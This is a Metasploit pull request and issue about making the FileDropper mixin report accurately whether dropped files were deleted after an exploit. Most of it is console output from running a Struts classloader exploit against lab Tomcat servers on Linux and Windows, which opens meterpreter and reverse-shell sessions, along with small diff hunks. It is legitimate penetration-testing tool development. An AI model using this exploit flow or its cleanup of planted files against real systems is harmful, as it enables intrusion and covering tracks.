### PR TITLE
Fix #4667 Add file checking to the on_new_session cleanup

### LINKED ISSUE #4667: register_files_for_cleanup says OK while file hasn't been deleted
Hi,

register_files_for_cleanup is telling me that a file has been successfully deleted while the file is still on the filesystem.

Testing env:
* Ubuntu Server 14.04.1 64 bits (3.13.0-32-generic #57-Ubuntu SMP)
* Tomcat 8.0.18
* Java version "1.7.0_76"
* Git rev: 7789d5d
* Module: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts_code_exec_classloader.rb

```
msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] Started bind handler
[*] 172.16.218.194:8080 - Modifying Class Loader...
[*] 172.16.218.194:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.194:8080 - Countdown 10...
[+] 172.16.218.194:8080 - Log file flushed at http://172.16.218.194:8080/btDa6495.jsp
[*] 172.16.218.194:8080 - Generating JSP...
[*] 172.16.218.194:8080 - Dumping JSP into the logfile...
[*] 172.16.218.194:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.194:8080 - Countdown 10...
[*] 172.16.218.194:8080 - Countdown 9...
[*] 172.16.218.194:8080 - Countdown 8...
[*] 172.16.218.194:8080 - Countdown 7...
[+] 172.16.218.194:8080 - Log file flushed at http://172.16.218.194:8080/btDa6495.jsp
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1236992 bytes) to 172.16.218.194
[*] Meterpreter session 2 opened (172.16.218.1:52381 -> 172.16.218.194:4444) at 2015-01-29 21:26:18 +0100
[+] Deleted btDa6495.jsp
[+] Deleted ebhy2

meterpreter > ls ROOT

Listing: ROOT
=============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40755/rwxr-xr-x   4096   dir   2015-01-29 21:26:03 +0100  .
40755/rwxr-xr-x   4096   dir   2015-01-29 21:26:18 +0100  ..
........
100664/rw-rw-r--  2616   fil   2015-01-29 21:26:23 +0100  btDa6495.jsp
........

meterpreter > getuid 
Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000
```

Doesn't seem to be a permissions issue:

```
test@ubuntu:/opt/tomcat/apache-tomcat-8.0.18/webapps$ ll ROOT/
total 208
drwxr-xr-x  3 test test  4096 Jan 29 12:26 ./
drwxr-xr-x 10 test test  4096 Jan 29 12:26 ../
........
-rw-rw-r--  1 test test  2616 Jan 29 12:26 btDa6495.jsp
........
test@ubuntu:/opt/tomcat/apache-tomcat-8.0.18/webapps$ grep test /etc/passwd
test:x:1000:1000:Test,,,:/home/test:/bin/bash
```

### PR DESCRIPTION
**Pull request by jvazquez-r7**
It has been reported which `FileDropper` fails to successfully notify when a file has been deleted or not, generating false positives (notifying a **non** deleted file as deleted)

`FileDropper` allows for files cleanup at two times: (1)`on_new_session` and (2) module `cleanup`. The information returned by `FileDropper`  can be improved at the `on_new_session` moment. But the `cleanup` deletion is exploit specific, so the best we can do is not assuming deletion has been successful, and show a warning.

The problem in the `on_new_session` deletion is which the `session.fs.file.rm` neither `shell_command_token` provide feedback about the file being deleted or not. So `FileDropper` just shows a success message once the deletion commands have been sent.

`FileDropper` uses a `session` to delete files, but it is designed to be used on exploits (both remote and locals), not post modules, so it hasn't access to `Post` mixins, which makes hard to work with files from a session, having to rewrite `Post` stuff inside the `FileDropper` mixin.

In this pull request, indeed, I'm adding a `file_dropper_file_exist?` method which makes the same task than `Msf::Post::File::file_exist?`. So the mixin now can checks if the file exists before and after deletion, and show more accurate feedback. Unfortunately the price is to duplicate more code from `Msf::Post::File`, which isn't very elegant :\, but after some tests, I ended up noticing which really trying to use the `Msf::Post::File` mixin from remote exploits is a bad idea.

Since showing unreliable information about file deletions is a bad thing I decided to duplicate code in this case. Hopefully this mixin doesn't need more features, and we don't need to do it again :\ Otherwise probably we'll need a better solution to reuse code from the `Post` mixins here.

Probably would be useful if @jlee-r7 reviews this, even shortly, since he is the original `FileDropper` author and maybe has ideas / more feedback.
## Verification
- [ ] Create a windows and linux testing environment for struts_code_exec_classloader. I've used the struts v1 application as described here: https://github.com/rapid7/metasploit-framework/pull/4683
- [ ] Get a Linux meterpreter

```
[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.133:8080 - Modifying Class Loader...
[*] 172.16.158.133:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.133:8080 - Countdown 10...
[*] 172.16.158.133:8080 - Countdown 9...
[*] 172.16.158.133:8080 - Countdown 8...
[*] 172.16.158.133:8080 - Countdown 7...
[*] 172.16.158.133:8080 - Countdown 6...
[+] 172.16.158.133:8080 - Log file flushed at http://172.16.158.133:8080/W9YJ43.jsp
[*] 172.16.158.133:8080 - Generating JSP...
[*] 172.16.158.133:8080 - Dumping JSP into the logfile...
[*] 172.16.158.133:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.133:8080 - Countdown 10...
[*] 172.16.158.133:8080 - Countdown 9...
[*] 172.16.158.133:8080 - Countdown 8...
[*] 172.16.158.133:8080 - Countdown 7...
[+] 172.16.158.133:8080 - Log file flushed at http://172.16.158.133:8080/W9YJ43.jsp
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1490944 bytes) to 172.16.158.133
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.133:43359) at 2015-05-18 13:48:32 -0500
[+] Deleted 6QwHUb
[!] This exploit may require manual cleanup of 'W9YJ43.jsp' on the target

meterpreter >
```
- [ ] Verify which the file marked as deleted has been really deleted:

```
meterpreter > ls 6QwHUb
[-] stdapi_fs_stat: Operation failed: 2
```
- [ ] Get a Linux shell session

```
msf exploit(struts_code_exec_classloader) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(struts_code_exec_classloader) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.133:8080 - Modifying Class Loader...
[*] 172.16.158.133:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.133:8080 - Countdown 10...
[*] 172.16.158.133:8080 - Countdown 9...
[*] 172.16.158.133:8080 - Countdown 8...
[+] 172.16.158.133:8080 - Log file flushed at http://172.16.158.133:8080/YI613.jsp
[*] 172.16.158.133:8080 - Generating JSP...
[*] 172.16.158.133:8080 - Dumping JSP into the logfile...
[*] 172.16.158.133:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.133:8080 - Countdown 10...
[*] 172.16.158.133:8080 - Countdown 9...
[*] 172.16.158.133:8080 - Countdown 8...
[*] 172.16.158.133:8080 - Countdown 7...
[*] Sending stage (36 bytes) to 172.16.158.133
[+] 172.16.158.133:8080 - Log file flushed at http://172.16.158.133:8080/YI613.jsp
[*] Command shell session 2 opened (172.16.158.1:4444 -> 172.16.158.133:43360) at 2015-05-18 13:51:47 -0500
[!] Tried to delete YI613.jsp, unknown result
[+] Deleted dpbO
```
- [ ] Verify which the file marked as deleted has been really deleted:

```
pwd
/home/juan/apache-tomcat-8.0.18
ls dpbO
ls: cannot access dpbO: No such file or directory
```
- [ ] Get a windows meterpreter session

```
msf exploit(struts_code_exec_classloader) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.131:8080 - Modifying Class Loader...
[*] 172.16.158.131:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.131:8080 - Countdown 10...
[+] 172.16.158.131:8080 - Log file flushed at http://172.16.158.131:8080/oylH0.jsp
[*] 172.16.158.131:8080 - Generating JSP...
[*] 172.16.158.131:8080 - Dumping JSP into the logfile...
[*] 172.16.158.131:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.131:8080 - Countdown 10...
[*] 172.16.158.131:8080 - Countdown 9...
[*] 172.16.158.131:8080 - Countdown 8...
[*] 172.16.158.131:8080 - Countdown 7...
[*] 172.16.158.131:8080 - Countdown 6...
[*] 172.16.158.131:8080 - Countdown 5...
[+] 172.16.158.131:8080 - Log file flushed at http://172.16.158.131:8080/oylH0.jsp
[*] Sending stage (882688 bytes) to 172.16.158.131
[*] Meterpreter session 3 opened (172.16.158.1:4444 -> 172.16.158.131:1795) at 2015-05-18 14:05:45 -0500
[!] This exploit may require manual cleanup of 'oylH0.jsp' on the target
[!] This exploit may require manual cleanup of 'MC41H' on the target
```
- [ ] Verify which both files are really there and require manual deletion:

```
meterpreter > pwd
C:\struts\apache-tomcat-8.0.18
meterpreter > ls MC41H
100666/rw-rw-rw-  4648  fil  2015-05-18 14:05:43 -0500  MC41H
meterpreter > cd webapps
meterpreter > cd ROOT
meterpreter > ls oylH0.jsp
100666/rw-rw-rw-  8699  fil  2015-05-18 14:05:50 -0500  oylH0.jsp
```
- [ ] Get a windows shell session

```
msf exploit(struts_code_exec_classloader) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.131:8080 - Modifying Class Loader...
[*] 172.16.158.131:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.131:8080 - Countdown 10...
[*] 172.16.158.131:8080 - Countdown 9...
[*] 172.16.158.131:8080 - Countdown 8...
[+] 172.16.158.131:8080 - Log file flushed at http://172.16.158.131:8080/HQ2864.jsp
[*] 172.16.158.131:8080 - Generating JSP...
[*] 172.16.158.131:8080 - Dumping JSP into the logfile...
[*] 172.16.158.131:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.131:8080 - Countdown 10...
[*] 172.16.158.131:8080 - Countdown 9...
[*] 172.16.158.131:8080 - Countdown 8...
[*] 172.16.158.131:8080 - Countdown 7...
[*] 172.16.158.131:8080 - Countdown 6...
[*] 172.16.158.131:8080 - Countdown 5...
[+] 172.16.158.131:8080 - Log file flushed at http://172.16.158.131:8080/HQ2864.jsp
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 172.16.158.131
[*] Command shell session 4 opened (172.16.158.1:4444 -> 172.16.158.131:1805) at 2015-05-18 14:10:34 -0500
[!] This exploit may require manual cleanup of 'HQ2864.jsp' on the target
[!] This exploit may require manual cleanup of 'fF7D' on the target

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\struts\apache-tomcat-8.0.18>
```
- [ ] Veirfy which both files are really there and require manual deletion:

```
C:\struts\apache-tomcat-8.0.18>dir fF7D
dir fF7D
 Volume in drive C has no label.
 Volume Serial Number is D003-765C

 Directory of C:\struts\apache-tomcat-8.0.18

05/18/2015  09:10 PM             4,620 fF7D
               1 File(s)          4,620 bytes
               0 Dir(s)  46,436,413,440 bytes free
C:\struts\apache-tomcat-8.0.18>cd webapps
cd webapps

C:\struts\apache-tomcat-8.0.18\webapps>cd ROOT
cd ROOT

C:\struts\apache-tomcat-8.0.18\webapps\ROOT>dir HQ2864.jsp
dir HQ2864.jsp
 Volume in drive C has no label.
 Volume Serial Number is D003-765C

 Directory of C:\struts\apache-tomcat-8.0.18\webapps\ROOT

05/18/2015  09:10 PM             8,818 HQ2864.jsp
               1 File(s)          8,818 bytes
               0 Dir(s)  46,436,413,440 bytes free

```

### CODE REVIEW

File: lib/msf/core/exploit/file_dropper.rb [hunk 1]
```diff
@@ -84,7 +30,32 @@ def register_files_for_cleanup(*files)
...
+  # When a new session is created, attempt to delete any files that the
+  # exploit created.
   #
+  # @param (see Msf::Exploit#on_new_session)
+  # @return [void]
+  def on_new_session(session)
+    super
+
+    if session.type == 'meterpreter'
+      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
```
Comment (Meatballs1) [inline lib/msf/core/exploit/file_dropper.rb]: Can normally check if extension is available with `session.stdapi` unless it doesn't apply to stdapi for some reason? ?

**Comment by wchen-r7** [comment]
Mine.

File: lib/msf/core/exploit/file_dropper.rb [hunk 2]
```diff
@@ -126,5 +96,105 @@ def cleanup
...
+      return false if f.nil? || f.empty?
+      return false unless f =~ /true/
+      true
+    end
+  end
+
+  # Sends a file deletion command to the remote +session+
+  #
+  # @param [String] file The file to delete
+  # @return [TrueClass] the delete command has been executed in the remote machine
```
Comment (wchen-r7) [inline lib/msf/core/exploit/file_dropper.rb]: @jvazquez-r7 If you don't mind, I will go ahead and modify TrueClass/FalseClass to just Boolean. As @jlee-r7 suggested.

**Comment by wchen-r7** [comment]
@jvazquez-r7 The pull request works good for me, I think I will merge it.

**Pull request merged**